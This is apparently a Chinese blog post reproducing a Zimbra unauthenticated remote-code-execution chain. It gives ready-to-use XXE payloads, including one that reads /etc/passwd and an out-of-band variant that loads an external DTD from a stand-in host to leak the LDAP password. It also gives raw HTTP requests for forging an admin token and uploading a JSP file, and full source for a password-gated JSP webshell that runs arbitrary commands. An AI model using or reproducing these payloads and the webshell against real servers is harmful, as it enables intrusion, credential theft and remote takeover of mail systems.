Zimbra未登錄RCE漏洞利用
首先我是根據這個PDF進行復現的,但是復現過程出現很多問題
首先使用這個XXE讀取文件
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
如果成功就可以繼續了,然后使用
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.xx.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Referer:https://mail.xx.com/zimbra/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=3d4a039e-0047-4828-aad1-326545bbb903
Content-Length: 348
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://xss.com/dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
出現http503以及普通權限賬號記錄下來<key name="zimbra_ldap_passwd">后面的value記錄下來
下一步要記得地址改成/service/soap
最后獲取ZM_ADMIN_AUTH_TOKEN的時候,COOKIE那里:改成ZM_ADMIN_AUTH_TOKEN=普通權限的TOKEN
最后一步上傳shell的時候, 一直提示上傳文件失敗如圖(這里困擾了很多人,包括T00ls的很多人)
直接給包
POST /service/extension/clientUploader/upload HTTP/1.1
Host: mail.xx.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Length: 353
Cookie:ZM_ADMIN_AUTH_TOKEN=0_530bf417d0f3e55ed628e4671e44b1dea4652bab_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343835323934303131393b61646d696e3d313a313b
Upgrade-Insecure-Requests:1
------WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Disposition:form-data;name="file";filename="abu.jsp"
Content-Type: image/jpeg
asasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasasV
------WebKitFormBoundary1orxAOGlJBBcOmuz--
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz
必須要加上這一句
最后再給一個能執行命令的馬,找了幾個都報500錯誤
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>???(l</title>
</head>
<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>
使用方法??pwd=admin&cmd=whoami
帶Cookie訪問webshell可以使用火狐的Modify Headers插件,發現只有在downloads目錄才需要帶cookie,根目錄下的/js /img都不需要!
參考鏈接:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd
https://www.t00ls.net/thread-50662-1-1.html
已有8166人參加
